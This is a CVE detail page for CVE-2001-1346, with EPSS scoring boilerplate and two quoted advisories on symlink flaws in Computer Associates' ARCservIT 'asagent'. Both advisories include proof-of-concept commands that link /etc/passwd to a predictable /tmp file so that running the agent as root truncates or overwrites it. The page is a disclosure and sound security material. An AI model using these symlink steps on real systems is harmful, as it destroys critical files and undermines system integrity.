CVE-2001-1346 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2741/info ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files. When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file. This may allow malicious local users to overwrite critical system files. As user: je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp And root: root@boxname# /usr/CYEagent/asagent start CA Universal Agent ADV v1.39 started on openview SunOS 5.8 Generic_108528-07 sun4u ARCserveIT Universal Agent started... Then, je@boxname~> ls -la /etc/passwd -r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd

source: https://www.securityfocus.com/bid/2748/info ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files. When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file. This may allow malicious local users to corrupt critical system files. je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp And root: root@boxname# /usr/CYEagent/asagent inet add Then, je@boxname~> cat /etc/passwd asagentd 6051/tcp # ARCserve agent asagentd 6051/udp # ARCserve agent